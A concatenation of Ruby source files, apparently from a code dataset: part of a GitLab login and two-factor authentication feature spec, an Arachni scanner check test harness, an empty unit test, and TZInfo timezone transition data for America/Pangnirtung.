expect(authentication_metrics).to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(page).not_to have_content(I18n.t('devise.failure.unconfirmed'))
expect(page).not_to have_link('Resend confirmation email', href: new_user_confirmation_path)
end
end
context 'when the confirmation grace period is expired' do
it 'prevents the user from logging in and renders a resend confirmation email link' do
travel_to((grace_period + 1.day).from_now) do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
gitlab_sign_in(user)
expect(page).to have_content(I18n.t('devise.failure.unconfirmed'))
expect(page).to have_link('Resend confirmation email', href: new_user_confirmation_path)
end
end
end
end
describe 'with the ghost user' do
it 'disallows login' do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
gitlab_sign_in(User.ghost)
expect(page).to have_content('Invalid login or password.')
end
it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
expect { gitlab_sign_in(User.ghost) }
.not_to change { User.ghost.reload.sign_in_count }
end
end
describe 'with two-factor authentication', :js do
def enter_code(code)
fill_in 'user_otp_attempt', with: code
click_button 'Verify code'
end
context 'with valid username/password' do
let(:user) { create(:user, :two_factor) }
before do
gitlab_sign_in(user, remember: true)
expect(page).to have_content('Two-Factor Authentication')
end
it 'does not show a "You are already signed in." error message' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(user.current_otp)
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not allow sign-in if the user password is updated before entering a one-time code' do
user.update!(password: 'new_password')
enter_code(user.current_otp)
expect(page).to have_content('An error occurred. Please sign in again.')
end
context 'using one-time code' do
it 'allows login with valid code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
it 'persists remember_me value via hidden field' do
field = first('input#user_remember_me', visible: false)
expect(field.value).to eq '1'
end
it 'blocks login with invalid code' do
# TODO invalid 2FA code does not generate any events
# See gitlab-org/gitlab-ce#49785
enter_code('foo')
expect(page).to have_content('Invalid two-factor code')
end
it 'allows login with invalid code, then valid code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code('foo')
expect(page).to have_content('Invalid two-factor code')
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
enter_code(user.current_otp)
end
end
context 'using backup code' do
let(:codes) { user.generate_otp_backup_codes! }
before do
expect(codes.size).to eq 10
# Ensure the generated codes get saved
user.save!(touch: false)
end
context 'with valid code' do
it 'allows login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
enter_code(codes.sample)
expect(current_path).to eq root_path
end
it 'invalidates the used code' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect { enter_code(codes.sample) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
end
it 'invalidates backup codes twice in a row' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter).twice
.and increment(:user_two_factor_authenticated_counter).twice
.and increment(:user_session_destroyed_counter)
random_code = codes.delete(codes.sample)
expect { enter_code(random_code) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
gitlab_sign_out
gitlab_sign_in(user)
expect { enter_code(codes.sample) }
.to change { user.reload.otp_backup_codes.size }.by(-1)
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
enter_code(codes.sample)
end
end
context 'with invalid code' do
it 'blocks login' do
# TODO, invalid two factor authentication does not increment
# metrics / counters, see gitlab-org/gitlab-ce#49785
code = codes.sample
expect(user.invalidate_otp_backup_code!(code)).to eq true
user.save!(touch: false)
expect(user.reload.otp_backup_codes.size).to eq 9
enter_code(code)
expect(page).to have_content('Invalid two-factor code.')
end
end
end
end
context 'when logging in via OAuth' do
let(:user) { create(:omniauth_user, :two_factor, extern_uid: 'my-uid', provider: 'saml')}
let(:mock_saml_response) do
File.read('spec/fixtures/authentication/saml_response.xml')
end
before do
stub_omniauth_saml_config(enabled: true, auto_link_saml_user: true, allow_single_sign_on: ['saml'],
providers: [mock_saml_config_with_upstream_two_factor_authn_contexts])
end
context 'when authn_context is worth two factors' do
let(:mock_saml_response) do
File.read('spec/fixtures/authentication/saml_response.xml')
.gsub('urn:oasis:names:tc:SAML:2.0:ac:classes:Password',
'urn:oasis:names:tc:SAML:2.0:ac:classes:SecondFactorOTPSMS')
end
it 'signs user in without prompting for second factor' do
# TODO, OAuth authentication does not fire events,
# see gitlab-org/gitlab-ce#49786
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
sign_in_using_saml!
expect(page).not_to have_content('Two-Factor Authentication')
expect(current_path).to eq root_path
end
end
context 'when two factor authentication is required' do
it 'shows 2FA prompt after OAuth login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
sign_in_using_saml!
expect(page).to have_content('Two-Factor Authentication')
enter_code(user.current_otp)
expect(current_path).to eq root_path
end
end
def sign_in_using_saml!
gitlab_sign_in_via('saml', user, 'my-uid', mock_saml_response)
end
end
end
describe 'without two-factor authentication' do
context 'with correct username and password' do
let(:user) { create(:user) }
it 'allows basic login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq root_path
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not show already signed in message when opening sign in page after login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
visit new_user_session_path
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'triggers ActiveSession.cleanup for the user' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
expect(ActiveSession).to receive(:cleanup).with(user).once.and_call_original
gitlab_sign_in(user)
end
context 'when the users password is expired' do
before do
user.update!(password_expires_at: Time.parse('2018-05-08 11:29:46 UTC'))
end
it 'asks for a new password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect(current_path).to eq(new_profile_password_path)
end
end
end
context 'with invalid username and password' do
let(:user) { create(:user, password: 'not-the-default') }
it 'blocks invalid login' do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_password_invalid_counter)
gitlab_sign_in(user)
expect(page).to have_content('Invalid login or password.')
end
end
end
describe 'with required two-factor authentication enabled' do
let(:user) { create(:user) }
# TODO: otp_grace_period_started_at
context 'global setting' do
before do
stub_application_setting(require_two_factor_authentication: true)
end
context 'with grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 48)
end
context 'within the grace period' do
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content('The global settings require you to enable Two-Factor Authentication for your account. You need to do this before ')
end
it 'allows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
click_link 'Configure it later'
expect(current_path).to eq root_path
end
end
context 'after the grace period' do
let(:user) { create(:user, otp_grace_period_started_at: 9999.hours.ago) }
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The global settings require you to enable Two-Factor Authentication for your account.'
)
end
it 'disallows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).not_to have_link('Configure it later')
end
end
end
context 'without grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 0)
end
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The global settings require you to enable Two-Factor Authentication for your account.'
)
end
end
end
context 'group setting' do
before do
group1 = create :group, name: 'Group 1', require_two_factor_authentication: true
group1.add_user(user, GroupMember::DEVELOPER)
group2 = create :group, name: 'Group 2', require_two_factor_authentication: true
group2.add_user(user, GroupMember::DEVELOPER)
end
context 'with grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 48)
end
context 'within the grace period' do
it 'redirects to two-factor configuration page' do
freeze_time do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable '\
'Two-Factor Authentication for your account. '\
'You can leave Group 1 and leave Group 2. '\
'You need to do this '\
'before '\
"#{(Time.zone.now + 2.days).strftime("%a, %d %b %Y %H:%M:%S %z")}"
)
end
end
it 'allows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
click_link 'Configure it later'
expect(current_path).to eq root_path
end
end
context 'after the grace period' do
let(:user) { create(:user, otp_grace_period_started_at: 9999.hours.ago) }
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable ' \
'Two-Factor Authentication for your account.'
)
end
it 'disallows skipping two-factor configuration', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).not_to have_link('Configure it later')
end
end
end
context 'without grace period defined' do
before do
stub_application_setting(two_factor_grace_period: 0)
end
it 'redirects to two-factor configuration page' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq profile_two_factor_auth_path
expect(page).to have_content(
'The group settings for Group 1 and Group 2 require you to enable ' \
'Two-Factor Authentication for your account. '\
'You can leave Group 1 and leave Group 2.'
)
end
end
end
end
describe 'UI tabs and panes' do
context 'when no defaults are changed' do
it 'does not render any tabs' do
visit new_user_session_path
ensure_no_tabs
end
it 'renders link to sign up path' do
visit new_user_session_path
expect(page.body).to have_link('Register now', href: new_user_registration_path)
end
end
context 'when signup is disabled' do
before do
stub_application_setting(signup_enabled: false)
visit new_user_session_path
end
it 'does not render any tabs' do
ensure_no_tabs
end
it 'does not render link to sign up path' do
visit new_user_session_path
expect(page.body).not_to have_link('Register now', href: new_user_registration_path)
end
end
context 'when ldap is enabled' do
include LdapHelpers
let(:provider) { 'ldapmain' }
let(:ldap_server_config) do
{
'label' => 'Main LDAP',
'provider_name' => provider,
'attributes' => {},
'encryption' => 'plain',
'uid' => 'uid',
'base' => 'dc=example,dc=com'
}
end
before do
stub_ldap_setting(enabled: true)
allow(::Gitlab::Auth::Ldap::Config).to receive_messages(enabled: true, servers: [ldap_server_config])
allow(Gitlab::Auth::OAuth::Provider).to receive_messages(providers: [provider.to_sym])
Ldap::OmniauthCallbacksController.define_providers!
Rails.application.reload_routes!
allow_next_instance_of(ActionDispatch::Routing::RoutesProxy) do |instance|
allow(instance).to receive(:"user_#{provider}_omniauth_callback_path")
.and_return("/users/auth/#{provider}/callback")
end
visit new_user_session_path
end
it 'correctly renders tabs and panes' do
ensure_tab_pane_correctness(['Main LDAP', 'Standard'])
end
it 'renders link to sign up path' do
expect(page.body).to have_link('Register now', href: new_user_registration_path)
end
end
context 'when crowd is enabled' do
before do
allow(Gitlab::Auth::OAuth::Provider).to receive_messages(providers: [:crowd])
stub_application_setting(crowd_enabled: true)
Ldap::OmniauthCallbacksController.define_providers!
Rails.application.reload_routes!
allow_next_instance_of(ActionDispatch::Routing::RoutesProxy) do |instance|
allow(instance).to receive(:user_crowd_omniauth_authorize_path)
.and_return("/users/auth/crowd/callback")
end
visit new_user_session_path
end
it 'correctly renders tabs and panes' do
ensure_tab_pane_correctness(%w(Crowd Standard))
end
end
end
describe 'Client helper classes and flags' do
it 'adds client browser and platform classes to page body' do
visit root_path
expect(find('body')[:class]).to include('gl-browser-generic')
expect(find('body')[:class]).to include('gl-platform-other')
end
end
context 'when terms are enforced' do
let(:user) { create(:user) }
before do
enforce_terms
end
it 'asks to accept the terms on first login' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(root_path)
expect(page).not_to have_content(I18n.t('devise.failure.already_authenticated'))
end
it 'does not ask for terms when the user already accepted them' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
accept_terms(user)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect(current_path).to eq(root_path)
end
context 'when 2FA is required for the user' do
before do
group = create(:group, require_two_factor_authentication: true)
group.add_developer(user)
end
context 'when the user did not enable 2FA' do
it 'asks to set 2FA before asking to accept the terms', :js do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(profile_two_factor_auth_path)
fill_in 'pin_code', with: user.reload.current_otp
click_button 'Register with two-factor app'
click_button 'Copy codes'
click_link 'Proceed'
expect(current_path).to eq(profile_account_path)
expect(page).to have_content('You have set up 2FA for your account! If you lose access to your 2FA device, you can use your recovery codes to access your account. Alternatively, if you upload an SSH key, you can use that key to generate additional recovery codes.')
end
end
context 'when the user already enabled 2FA' do
before do
user.update!(otp_required_for_login: true,
otp_secret: User.generate_otp_secret(32))
end
it 'asks the user to accept the terms' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
.and increment(:user_two_factor_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
fill_in 'user_otp_attempt', with: user.reload.current_otp
click_button 'Verify code'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(root_path)
end
end
end
context 'when the users password is expired' do
before do
user.update!(password_expires_at: Time.parse('2018-05-08 11:29:46 UTC'))
end
it 'asks the user to accept the terms before setting a new password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
visit new_user_session_path
fill_in 'user_login', with: user.email
fill_in 'user_password', with: '12345678'
click_button 'Sign in'
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(new_profile_password_path)
fill_in 'user_current_password', with: '12345678'
fill_in 'user_password', with: 'new password'
fill_in 'user_password_confirmation', with: 'new password'
click_button 'Set new password'
expect(page).to have_content('Password successfully changed')
end
end
context 'when the user does not have an email configured' do
let(:user) { create(:omniauth_user, extern_uid: 'my-uid', provider: 'saml', email: '[email protected]') }
before do
stub_omniauth_saml_config(enabled: true, auto_link_saml_user: true, allow_single_sign_on: ['saml'], providers: [mock_saml_config])
end
it 'asks the user to accept the terms before setting an email' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
gitlab_sign_in_via('saml', user, 'my-uid')
expect_to_be_on_terms_page
click_button 'Accept terms'
expect(current_path).to eq(profile_path)
fill_in 'Email', with: '[email protected]'
click_button 'Update profile settings'
expect(page).to have_content('Profile was successfully updated')
end
end
end
context 'when sending confirmation email and not yet confirmed' do
let!(:user) { create(:user, confirmed_at: nil) }
let(:grace_period) { 2.days }
before do
stub_application_setting(send_user_confirmation_email: true)
stub_feature_flags(soft_email_confirmation: true)
allow(User).to receive(:allow_unconfirmed_access_for).and_return grace_period
end
it 'allows login and shows a flash warning to confirm the email address' do
expect(authentication_metrics).to increment(:user_authenticated_counter)
gitlab_sign_in(user)
expect(current_path).to eq root_path
expect(page).to have_content("Please check your email (#{user.email}) to verify that you own this address and unlock the power of CI/CD.")
end
context "when not having confirmed within Devise's allow_unconfirmed_access_for time" do
it 'does not allow login and shows a flash alert to confirm the email address' do
travel_to((grace_period + 1.day).from_now) do
expect(authentication_metrics)
.to increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
gitlab_sign_in(user)
expect(current_path).to eq new_user_session_path
expect(page).to have_content(I18n.t('devise.failure.unconfirmed'))
end
end
end
end
end
| 32.641758 | 275 | 0.657151 |
ffce350a2bcdd5cc830046d74bef1554c5313f62 | 5,164 | shared_examples_for 'check' do
include_examples 'component'
module Format
include Arachni::Element::Capabilities::Mutable::Format
end
module Element
include Arachni::Element
end
module Severity
include Arachni::Severity
end
before( :all ) do
@issues = []
@url = url
@name = name
end
before( :each ) do
reset_framework
options.url = @url
framework.checks.load @name
# Do not deduplicate, the check tests need to see everything.
current_check.instance_eval { define_method( :skip? ) { |_| false } }
Arachni::Data.issues.do_not_store
Arachni::Data.issues.on_new_pre_deduplication do |issue|
@issues << issue
# Leave this here, helps us save every kind of issue in order to test
# the reporters.
if $spec_issues
$spec_issues << issue
end
end
Arachni::Element::Capabilities::Analyzable::Timeout.do_not_deduplicate
end
after( :each ) do
@issues.clear
process_kill_reactor
framework.reset
end
describe '.info' do
it 'holds the right platforms' do
current_check.platforms.sort.should == self.class.platforms.sort
end
it 'holds the right elements' do
current_check.info[:elements].map(&:to_s).sort.should ==
self.class.elements.map(&:to_s).sort
end
end
def self.easy_test( run_checks = true, &block )
if self.platforms.any?
context 'when the platform is' do
platforms.each do |platform|
test_platform( platform, run_checks, &block )
end
end
else
elements.each do |element|
test_element( element, nil, run_checks, &block )
end
end
end
def self.test_platform( platform, run_checks, &block )
context platform do
elements.each do |element|
test_element( element, platform, run_checks, &block )
end
end
end
def self.test_element( element, platform, run_checks, &block )
it "logs vulnerable #{element.type} elements" do
run_test element, platform, run_checks, &block
end
end
def run_test( element, platform, run_checks, &block )
if !issue_count && !issue_count_per_platform &&
!issue_count_per_element && !issue_count_per_element_per_platform
raise 'No issue count provided via a suitable method.'
end
options.url = url + platform.to_s
options.scope.include_path_patterns = options.url
audit element, run_checks
if issue_count
issues.size.should == issue_count
end
if issue_count_per_platform
issues.size.should ==
issue_count_per_platform[platform]
end
if issue_count_per_element
issues.size.should == issue_count_per_element[element]
end
if issue_count_per_element_per_platform
issues.size.should ==
issue_count_per_element_per_platform[platform][element]
end
instance_eval &block if block_given?
end
def issues
@issues
end
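# Expected issue counts; these default to nil and are overridden by the
# individual check specs.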
def issue_count
end
def issue_count_per_platform
end
def issue_count_per_element
end
def issue_count_per_element_per_platform
end
def self.platforms
[]
end
def self.elements
end
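# Restricts the audit to the given element type, runs the scan and, when issues
# are expected, verifies that only that element type was logged with the
# severity advertised by the check.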
def audit( element_type, logs_issues = true )
if !element_type.is_a?( Symbol )
element_type = element_type.type
end
options.audit.skip_elements :links, :forms, :cookies, :headers, :link_templates
if element_type.to_s.start_with? 'link_template'
options.audit.link_templates = [
/\/input\/(?<input>.+)\//,
/input\|(?<input>.+)/
]
else
options.audit.elements element_type rescue NoMethodError
end
run
e = element_type.to_s
e << 's' if element_type.to_s[-1] != 's'
e = element_type.to_s
e = e[0...-1] if element_type.to_s[-1] == 's'
if logs_issues && issues.any?
# make sure we ONLY got results for the requested element type
issues.map { |i| i.vector.class.type }.uniq.should == [e.to_sym]
if current_check.info[:issue]
issues.map { |i| i.severity }.uniq.should ==
[current_check.info[:issue][:severity]]
end
end
end
def current_check
framework.checks.values.first
end
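# Resolves the URL of the web application serving this check's test pages,
# trying a few naming conventions for the test server.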
def url
@url ||= (
begin
web_server_url_for( "#{name}_check" )
rescue
begin
web_server_url_for( name )
rescue
web_server_url_for( "#{name}_https" )
end
end
) + '/'
end
end
| 25.949749 | 87 | 0.562355 |
accca9e1aa491e9be4f577def88a9ebee071820b | 70 | require 'test/unit'
class LocalizameTest < Test::Unit::TestCase
end
| 11.666667 | 43 | 0.757143 |
1d5a582a44681c32c9661863482dab89deae0bfb | 10,628 | # encoding: UTF-8
# This file contains data derived from the IANA Time Zone Database
# (http://www.iana.org/time-zones).
module TZInfo
module Data
module Definitions
module America
module Pangnirtung
include TimezoneDefinition
timezone 'America/Pangnirtung' do |tz|
tz.offset :o0, 0, 0, :zzz
tz.offset :o1, -14400, 0, :AST
tz.offset :o2, -14400, 3600, :AWT
tz.offset :o3, -14400, 3600, :APT
tz.offset :o4, -14400, 7200, :ADDT
tz.offset :o5, -14400, 3600, :ADT
tz.offset :o6, -18000, 3600, :EDT
tz.offset :o7, -18000, 0, :EST
tz.offset :o8, -21600, 0, :CST
tz.offset :o9, -21600, 3600, :CDT
tz.transition 1921, 1, :o1, -1546300800, 4845381, 2
tz.transition 1942, 2, :o2, -880221600, 9721599, 4
tz.transition 1945, 8, :o3, -769395600, 58360379, 24
tz.transition 1945, 9, :o1, -765399600, 58361489, 24
tz.transition 1965, 4, :o4, -147902400, 7316627, 3
tz.transition 1965, 10, :o1, -131572800, 7317194, 3
tz.transition 1980, 4, :o5, 325663200
tz.transition 1980, 10, :o1, 341384400
tz.transition 1981, 4, :o5, 357112800
tz.transition 1981, 10, :o1, 372834000
tz.transition 1982, 4, :o5, 388562400
tz.transition 1982, 10, :o1, 404888400
tz.transition 1983, 4, :o5, 420012000
tz.transition 1983, 10, :o1, 436338000
tz.transition 1984, 4, :o5, 452066400
tz.transition 1984, 10, :o1, 467787600
tz.transition 1985, 4, :o5, 483516000
tz.transition 1985, 10, :o1, 499237200
tz.transition 1986, 4, :o5, 514965600
tz.transition 1986, 10, :o1, 530686800
tz.transition 1987, 4, :o5, 544600800
tz.transition 1987, 10, :o1, 562136400
tz.transition 1988, 4, :o5, 576050400
tz.transition 1988, 10, :o1, 594190800
tz.transition 1989, 4, :o5, 607500000
tz.transition 1989, 10, :o1, 625640400
tz.transition 1990, 4, :o5, 638949600
tz.transition 1990, 10, :o1, 657090000
tz.transition 1991, 4, :o5, 671004000
tz.transition 1991, 10, :o1, 688539600
tz.transition 1992, 4, :o5, 702453600
tz.transition 1992, 10, :o1, 719989200
tz.transition 1993, 4, :o5, 733903200
tz.transition 1993, 10, :o1, 752043600
tz.transition 1994, 4, :o5, 765352800
tz.transition 1994, 10, :o1, 783493200
tz.transition 1995, 4, :o6, 796802400
tz.transition 1995, 10, :o7, 814946400
tz.transition 1996, 4, :o6, 828860400
tz.transition 1996, 10, :o7, 846396000
tz.transition 1997, 4, :o6, 860310000
tz.transition 1997, 10, :o7, 877845600
tz.transition 1998, 4, :o6, 891759600
tz.transition 1998, 10, :o7, 909295200
tz.transition 1999, 4, :o6, 923209200
tz.transition 1999, 10, :o8, 941349600
tz.transition 2000, 4, :o9, 954662400
tz.transition 2000, 10, :o7, 972802800
tz.transition 2001, 4, :o6, 986108400
tz.transition 2001, 10, :o7, 1004248800
tz.transition 2002, 4, :o6, 1018162800
tz.transition 2002, 10, :o7, 1035698400
tz.transition 2003, 4, :o6, 1049612400
tz.transition 2003, 10, :o7, 1067148000
tz.transition 2004, 4, :o6, 1081062000
tz.transition 2004, 10, :o7, 1099202400
tz.transition 2005, 4, :o6, 1112511600
tz.transition 2005, 10, :o7, 1130652000
tz.transition 2006, 4, :o6, 1143961200
tz.transition 2006, 10, :o7, 1162101600
tz.transition 2007, 3, :o6, 1173596400
tz.transition 2007, 11, :o7, 1194156000
tz.transition 2008, 3, :o6, 1205046000
tz.transition 2008, 11, :o7, 1225605600
tz.transition 2009, 3, :o6, 1236495600
tz.transition 2009, 11, :o7, 1257055200
tz.transition 2010, 3, :o6, 1268550000
tz.transition 2010, 11, :o7, 1289109600
tz.transition 2011, 3, :o6, 1299999600
tz.transition 2011, 11, :o7, 1320559200
tz.transition 2012, 3, :o6, 1331449200
tz.transition 2012, 11, :o7, 1352008800
tz.transition 2013, 3, :o6, 1362898800
tz.transition 2013, 11, :o7, 1383458400
tz.transition 2014, 3, :o6, 1394348400
tz.transition 2014, 11, :o7, 1414908000
tz.transition 2015, 3, :o6, 1425798000
tz.transition 2015, 11, :o7, 1446357600
tz.transition 2016, 3, :o6, 1457852400
tz.transition 2016, 11, :o7, 1478412000
tz.transition 2017, 3, :o6, 1489302000
tz.transition 2017, 11, :o7, 1509861600
tz.transition 2018, 3, :o6, 1520751600
tz.transition 2018, 11, :o7, 1541311200
tz.transition 2019, 3, :o6, 1552201200
tz.transition 2019, 11, :o7, 1572760800
tz.transition 2020, 3, :o6, 1583650800
tz.transition 2020, 11, :o7, 1604210400
tz.transition 2021, 3, :o6, 1615705200
tz.transition 2021, 11, :o7, 1636264800
tz.transition 2022, 3, :o6, 1647154800
tz.transition 2022, 11, :o7, 1667714400
tz.transition 2023, 3, :o6, 1678604400
tz.transition 2023, 11, :o7, 1699164000
tz.transition 2024, 3, :o6, 1710054000
tz.transition 2024, 11, :o7, 1730613600
tz.transition 2025, 3, :o6, 1741503600
tz.transition 2025, 11, :o7, 1762063200
tz.transition 2026, 3, :o6, 1772953200
tz.transition 2026, 11, :o7, 1793512800
tz.transition 2027, 3, :o6, 1805007600
tz.transition 2027, 11, :o7, 1825567200
tz.transition 2028, 3, :o6, 1836457200
tz.transition 2028, 11, :o7, 1857016800
tz.transition 2029, 3, :o6, 1867906800
tz.transition 2029, 11, :o7, 1888466400
tz.transition 2030, 3, :o6, 1899356400
tz.transition 2030, 11, :o7, 1919916000
tz.transition 2031, 3, :o6, 1930806000
tz.transition 2031, 11, :o7, 1951365600
tz.transition 2032, 3, :o6, 1962860400
tz.transition 2032, 11, :o7, 1983420000
tz.transition 2033, 3, :o6, 1994310000
tz.transition 2033, 11, :o7, 2014869600
tz.transition 2034, 3, :o6, 2025759600
tz.transition 2034, 11, :o7, 2046319200
tz.transition 2035, 3, :o6, 2057209200
tz.transition 2035, 11, :o7, 2077768800
tz.transition 2036, 3, :o6, 2088658800
tz.transition 2036, 11, :o7, 2109218400
tz.transition 2037, 3, :o6, 2120108400
tz.transition 2037, 11, :o7, 2140668000
tz.transition 2038, 3, :o6, 2152162800, 59171923, 24
tz.transition 2038, 11, :o7, 2172722400, 9862939, 4
tz.transition 2039, 3, :o6, 2183612400, 59180659, 24
tz.transition 2039, 11, :o7, 2204172000, 9864395, 4
tz.transition 2040, 3, :o6, 2215062000, 59189395, 24
tz.transition 2040, 11, :o7, 2235621600, 9865851, 4
tz.transition 2041, 3, :o6, 2246511600, 59198131, 24
tz.transition 2041, 11, :o7, 2267071200, 9867307, 4
tz.transition 2042, 3, :o6, 2277961200, 59206867, 24
tz.transition 2042, 11, :o7, 2298520800, 9868763, 4
tz.transition 2043, 3, :o6, 2309410800, 59215603, 24
tz.transition 2043, 11, :o7, 2329970400, 9870219, 4
tz.transition 2044, 3, :o6, 2341465200, 59224507, 24
tz.transition 2044, 11, :o7, 2362024800, 9871703, 4
tz.transition 2045, 3, :o6, 2372914800, 59233243, 24
tz.transition 2045, 11, :o7, 2393474400, 9873159, 4
tz.transition 2046, 3, :o6, 2404364400, 59241979, 24
tz.transition 2046, 11, :o7, 2424924000, 9874615, 4
tz.transition 2047, 3, :o6, 2435814000, 59250715, 24
tz.transition 2047, 11, :o7, 2456373600, 9876071, 4
tz.transition 2048, 3, :o6, 2467263600, 59259451, 24
tz.transition 2048, 11, :o7, 2487823200, 9877527, 4
tz.transition 2049, 3, :o6, 2499318000, 59268355, 24
tz.transition 2049, 11, :o7, 2519877600, 9879011, 4
tz.transition 2050, 3, :o6, 2530767600, 59277091, 24
tz.transition 2050, 11, :o7, 2551327200, 9880467, 4
tz.transition 2051, 3, :o6, 2562217200, 59285827, 24
tz.transition 2051, 11, :o7, 2582776800, 9881923, 4
tz.transition 2052, 3, :o6, 2593666800, 59294563, 24
tz.transition 2052, 11, :o7, 2614226400, 9883379, 4
tz.transition 2053, 3, :o6, 2625116400, 59303299, 24
tz.transition 2053, 11, :o7, 2645676000, 9884835, 4
tz.transition 2054, 3, :o6, 2656566000, 59312035, 24
tz.transition 2054, 11, :o7, 2677125600, 9886291, 4
tz.transition 2055, 3, :o6, 2688620400, 59320939, 24
tz.transition 2055, 11, :o7, 2709180000, 9887775, 4
tz.transition 2056, 3, :o6, 2720070000, 59329675, 24
tz.transition 2056, 11, :o7, 2740629600, 9889231, 4
tz.transition 2057, 3, :o6, 2751519600, 59338411, 24
tz.transition 2057, 11, :o7, 2772079200, 9890687, 4
tz.transition 2058, 3, :o6, 2782969200, 59347147, 24
tz.transition 2058, 11, :o7, 2803528800, 9892143, 4
tz.transition 2059, 3, :o6, 2814418800, 59355883, 24
tz.transition 2059, 11, :o7, 2834978400, 9893599, 4
tz.transition 2060, 3, :o6, 2846473200, 59364787, 24
tz.transition 2060, 11, :o7, 2867032800, 9895083, 4
tz.transition 2061, 3, :o6, 2877922800, 59373523, 24
tz.transition 2061, 11, :o7, 2898482400, 9896539, 4
tz.transition 2062, 3, :o6, 2909372400, 59382259, 24
tz.transition 2062, 11, :o7, 2929932000, 9897995, 4
tz.transition 2063, 3, :o6, 2940822000, 59390995, 24
tz.transition 2063, 11, :o7, 2961381600, 9899451, 4
